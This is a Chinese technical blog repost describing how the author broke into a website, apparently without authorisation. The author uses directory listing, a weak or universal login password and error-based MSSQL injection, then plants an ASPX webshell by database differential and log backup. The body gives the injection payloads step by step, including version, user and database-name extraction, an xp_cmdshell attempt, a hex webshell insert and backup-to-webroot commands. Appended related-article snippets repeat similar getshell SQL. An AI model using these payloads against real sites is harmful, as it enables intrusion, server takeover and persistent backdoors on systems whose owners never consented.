一次差异备份拿shell过程

最新推荐文章于 2021-02-08 08:17:59 发布
最新推荐文章于 2021-02-08 08:17:59 发布
阅读量565 收藏
点赞数
文章标签: shell 数据库 c#
原文链接:http://blog.51cto.com/z2ppp/2064834
版权

0x00 前言

扫描器扫到了某个网站存在目录浏览,于是便有了本文。。。

知识点科普:

1. 目录浏览

目录浏览在我个人看来是危害较大的一个漏洞,该漏洞是指“在没有默认文档的目录下,列出该目录下所有文件名及文件信息”,如果站点存在这种错误配置,***者如果知道其中目录名,则可以查看到这些目录下的文件。

一次差异备份拿shell过程

2.差异备份条件
  1. 站点绝对路径
  2. 具有路径写入权限
  3. 具备当前数据库权限

0x01 正文

站点配置不当,导致目录浏览,通过查看首页的源代码,翻到了几个目录
一次差异备份拿shell过程
一次差异备份拿shell过程
随便访问了一个,发现会报错,说明网站管理员并没有把错误信息屏蔽
一次差异备份拿shell过程
还存在信息泄漏。。
一次差异备份拿shell过程

但是通常目录下的文件是需要传递参数去执行的,我们并不知道参数名,所以并没办法利用

辗转后到前台登录界面查看
一次差异备份拿shell过程
尝试了一下,发现密码处存在注入和弱口令admin,也就是可以用万能密码登录啦
本来想找一处文件上传,直接getshell,但是发现好像不存在,却发现了网站使用了kindeditor和网站绝对路径
一次差异备份拿shell过程

那么前面登录口处存在注入,后台一般也有很多注入的啦,尝试找一下,如果有的话,配合绝对路径可以进行getshell
一次差异备份拿shell过程
一次差异备份拿shell过程

okok,发现注入啦,但到目前为止并不知道数据库是什么类型,一般aspx+mssql,由于前面发现是可以报错的,那么尝试使用mssql的报错方式

%' and 1=@@version --a

一次差异备份拿shell过程

mssql数据库,查看一下当前的用户身份

%' and 1=user --a

一次差异备份拿shell过程

dbo的权限并不是sa,尝试一下xp_cmdshell

%';exec('master..xp_cmdshell whoami') --a

一次差异备份拿shell过程

并没有开启xp_cmdshell,且dbo的权限是不足以开启xp_cmdshell的,那么只能尝试使用差异备份的方式来写入一个webshell

1. 获取当前数据库名称
%' and 1=db_name() --a

一次差异备份拿shell过程

2. 对当前数据库进行备份
%';backup database 数据库名称 to disk = '绝对路径' with init --a

如果成功备份,则网页返回%'的查询结果(因为是堆叠且后面语句的执行并不会有返回结果)

3.创建表格,并写入webshell
%';create table cmd(a image) --a
%';insert into cmd(a) values (0xxxxx) --a  //webshell的hex值

可以用网上的工具,笔者用以前自己开发的小工具
一次差异备份拿shell过程

4.进行第二次备份
%';backup log 数据库名称 to disk = '绝对路径\\abc.aspx'--

这里我将webshell写入子目录中,因为有目录浏览,能确切看到文件是否产生
一次差异备份拿shell过程

创建成功后,尝试连接
一次差异备份拿shell过程

0x02 后续

  1. 如果能直接使用xp_cmdshell就尽量不要使用差异备份,因为会产生备份文件,如果数据库很大的话,会造成影响
    一次差异备份拿shell过程
  2. 有任何错误,请斧正

转载于:https://blog.51cto.com/z2ppp/2064834

weixin_33724059
关注
mssql差异备份获得的webshell.doc
07-18
mssql差异备份获得的webshellmssql差异备份获得的webshell
数据库备份Shell脚本.zip
08-29
本文将详细介绍基于Xtrabackup的MySQL数据库备份Shell脚本及其相关知识点。 1. **Xtrabackup介绍**: Xtrabackup是由Percona公司开发的开源备份工具,支持InnoDB和XtraDB存储引擎的全量和增量备份。它能够实现在线...
mysql差异备份shell_Shell脚本实现跨云数据库自动备份
weixin_31256683的博客
02-02 347
点击了解更多技术资料和免费学习视频,请加入讨论群:662736393欢迎关注百哥IT技术专栏,联系QQ:3473067134一、为什么要跨云进行数据库备份虽然各个云服务商为企业建设IT系统提供了极大便利,也实现了很高的可靠性,但仍然不是万无一失的,这些例子都曾造成很大的影响不久前,微盟工程师恶意删库,导致大量客户数据丢失,该事件几乎在所有IT从业者朋友圈刷屏。18年8月,腾讯云服务器一个硬盘固件b...
mysql差异备份shell_MSSQL差异备份shell(转) | 学步园
weixin_39917811的博客
01-19 132
MSSQL差异备份,就是和前一次备份作对比,把不一样的内容备份下来,这样,只要前一次备份后,插入新的内容,差异备份就可以把刚插入的内容备份出来,而这个备份文件将大大减少,得到webShell的成功也提高了不少!差异备份的流程大概这样:1.完整备份一次(保存位置当然可以改)backup database 库名 to disk ='c:\ddd.bak';--2.创建表并插入数据create tabl...
Mssql(sqlserver)差异备份getshell思路笔记
来到了学渣的博客
04-05 1778
差异备份的概念(百度百科): 备份自上一次完全备份之后有变化的数据。差异备份过程中,只备份有标记的那些选中的文件和文件夹。它不清除标记,也即备份后不标记为已备份文件。换言之,不清除存档属性。 差异备份getshell条件: 目标站是否存在mssql数据库注入漏洞 目标站的用户是否具备sa权限、dbo权限 找到网站的物理路径 大概思路: 假设:http://xxxxx/show.aspx?c...
mysql差异备份shell_MSSQL2005差异备份shell (MSSQL2005 Backup Get Shell)
weixin_31237295的博客
01-19 234
昨晚在拿站过程中遇到了个ASP+MSSQL2005的注入点,权限是DB_Owner的权限,网站路径也搞到了,本想使用差异备份,在数据库日志中插入一句话,然后备份到网站目录下拿shell的,估计是用户没有备份数据库的权限,但使用MSSQL2000的备份方法根本行不通,后来才想到MSSQL2005的备份和MSSQL2000有点不同。后来在网上搜半天没有找到具体的备份语句,后来在群求助,小冰才发我了具体...
xtrabackup备份恢复shell脚本
08-26
使用Xtrabackup进行全库、累计和差异备份,通常涉及以下步骤: 1. **全量备份**:首次备份时,执行`xtrabackup --backup`命令,获取数据库的完全状态。 2. **增量备份**:之后,使用`--incremental-basedir`参数...
shell一个mysql数据备份脚本
09-09
此外,还可以考虑使用更高效的备份方法,如增量备份差异备份。 总结来说,通过编shell脚本配合`mysqldump`和`crontab`,可以实现MySQL数据库的自动备份与清理,以确保数据安全并有效管理存储资源。在实际操作中...
mysql备份shell脚本
06-10
mysql备份支持全量、日志备份
mysql备份shell脚本与备份文件的还原 ,每日和每月备份shell脚本,重要参数说明,还原时的主要问题分析与解决
最新发布
01-10
二、每日备份shell脚本 每日备份脚本主要利用cron定时任务执行,以下是一个基本示例: ```bash #!/bin/bash # 设置MySQL服务器的相关信息 USER="root" PASSWORD="your_password" DATABASE="your_database" BACKUP_...
所有差异备份工具包(getwebshell2,sqlcomm,小志 SQL沙盘提权备份工具.exe,GetWebshellah56bug大众版,MSSQL_UP,DB_OWNER权限备份hta到启动项提权的小工具)
05-02
所有差异备份工具包(getwebshell2,sqlcomm,小志 SQL沙盘提权备份工具.exe,GetWebshellah56bug大众版,MSSQL_UP,DB_OWNER权限备份hta到启动项提权的小工具等等!)
SQL_Server_2008完整+差异备份及还原实战
04-23
SQL_Server_2008完整+差异备份及还原实战 本人亲自操作。如果你不能执行,肯定是某一个步骤出现错误。 有一点就是 sql的 Sql server 代理这个服务一定要开,否则无法执行
mssql差异备份shell
一个码农的笔记
03-08 5354
(1)首先: declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x4e6577706f7274 backup database @a to disk=@s; 注意:0x4e6577706f7274 这个字符串是数据库名字的十六进制数字,这个这个字符串的转换用hackbar这个小工具进行转换 这里的数据库名字是:Newpor
mysql差异备份数据库get shell_Web渗透之mssql2005 差异备份getshell
weixin_30781905的博客
01-19 206
这里记录下mssql2005差异备份shell过程http://192.168.5.21:81/index.asp?id=1;alter/**/database/**/[asp_test]/**/set/**/recovery/**/full--http://192.168.5.21:81/index.asp?id=1;;drop/**/table/**/[itpro]--http://192...
mysql差异备份数据库get shell_shell进行完整和增量备份mysql数据库
weixin_33603813的博客
02-08 206
shell进行完整和增量备份mysql数据库文档介绍本文档采用mysqldump 对数据库进行备份,mysqldump 是采用SQL级别的备份机制,它将数据表导成 SQL脚本文件,在不同的 MySQL 版本之间升级时相对比较合适,这也是最常用的备份方法,mysqldump 比直接拷贝要慢些。本文描述Mysql数据库的自动备份,包括完全备份和增量备份。其中,完全备份每周执行一次,增量备份每天都会执行...
完全备份数据和差异备份数据的shell脚本
小雪的专栏
05-05 868
http://ccschan.blog.51cto.com/11854461/1921723
利用log备份得到webshell
liswa 电脑备忘录
03-25 1579
经历:通过 or = 进入,下载回来一个exe文件的报名器,用ultraedit得到其中的mssql连接密码,是dbowner权限 ,可以远程连接,使用xp_dirtree d:/,1,1 得到其web目录,在网上查得一种 log备份得到webshell的技巧alter database xxxx set RECOVERY FULL create table cmd (a ima
了一个差异备份的工具
liswa 电脑备忘录
02-16 980
参考xiaolu的那个工具的说明的。(找了几个站点没有下到他那个工具,所以就干脆自己了个)界面丑陋,毫无章法,不过只用了几行语句,很容易就成了。(这里好像不能上传文件吧)不过差异备份出来的文件用于jsp不行,郁闷。刚开始学jsp,也不清楚原因在哪里。是不支持别的字符集?
渗透必备:linux下备份shell
cnbird's blog
12-29 1032
关于php包含Apache日志的利用,其实也就是利用提交的网址里有php语句,然后再被Apache服务器的日志记录,然后php再去包含执行,从而包含了去执行。当然,这种办法最大的弊端是Apache日志肯定会过大,回应的时候当然会超时什么的,所以也是受条件限制的。全当一种研究算了。下面是我的测试过程,我觉得很有意思,你也看看。 比如说,在一个php存在包含漏洞就像这样,存在一句php包含漏洞的语句
MySQL备份自动化:Shell脚本快速指南
常见的MySQL备份方法包括完全备份、增量备份差异备份。 知识点二:MySQL备份的类型及适用场景 - 完全备份备份整个数据库的所有数据,包括数据表、索引、存储过程等。适用于数据量不大或者对备份时间没有严格...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值